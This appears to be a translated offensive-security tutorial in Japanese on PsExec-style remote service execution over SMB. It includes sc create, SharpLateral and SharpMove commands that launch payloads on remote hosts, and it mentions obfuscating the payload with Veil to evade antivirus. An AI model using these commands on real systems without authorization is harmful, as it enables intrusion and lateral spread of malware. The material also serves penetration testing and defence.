PsExec/Winexec/ScExec/SMBExec

Reading time: 5 minutes

どのように機能するか

プロセスは以下のステップで概説されており、サービスバイナリがどのように操作され、SMBを介してターゲットマシンでリモート実行を達成するかを示しています。

1. ADMIN$共有にサービスバイナリをSMB経由でコピーします。
2. リモートマシン上にサービスを作成し、バイナリを指します。
3. サービスがリモートで開始されます。
4. 終了時に、サービスは停止され、バイナリは削除されます。

PsExecを手動で実行するプロセス

msfvenomで作成され、ウイルス対策検出を回避するためにVeilを使用して難読化された実行可能ペイロード「met8888.exe」を仮定すると、以下のステップが取られます。

• バイナリのコピー: 実行可能ファイルはコマンドプロンプトからADMIN$共有にコピーされますが、ファイルシステムのどこにでも配置して隠すことができます。
• バイナリをコピーする代わりに、powershell.exeやcmd.exeのようなLOLBASバイナリを使用して、引数から直接コマンドを実行することも可能です。例: sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
• サービスの作成: Windowsのscコマンドを利用して、リモートでWindowsサービスを照会、作成、削除することができ、「meterpreter」という名前のサービスがアップロードされたバイナリを指すように作成されます。
• サービスの開始: 最後のステップはサービスを開始することで、バイナリが本物のサービスバイナリでないため、期待される応答コードを返さずに「タイムアウト」エラーが発生する可能性が高いです。このエラーは、バイナリの実行が主な目的であるため、重要ではありません。

Metasploitリスナーを観察すると、セッションが正常に開始されたことがわかります。

Learn more about the sc command.

詳細な手順については、https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/を参照してください。

• Windows SysinternalsバイナリPsExec.exeを使用することもできます：

またはwebddav経由でアクセスできます：

\\live.sysinternals.com\tools\PsExec64.exe -accepteula

• あなたはSharpLateralを使用することもできます：

SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName

• あなたはSharpMoveも使用できます:

SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

• **Impacketのpsexecとsmbexec.py**も使用できます。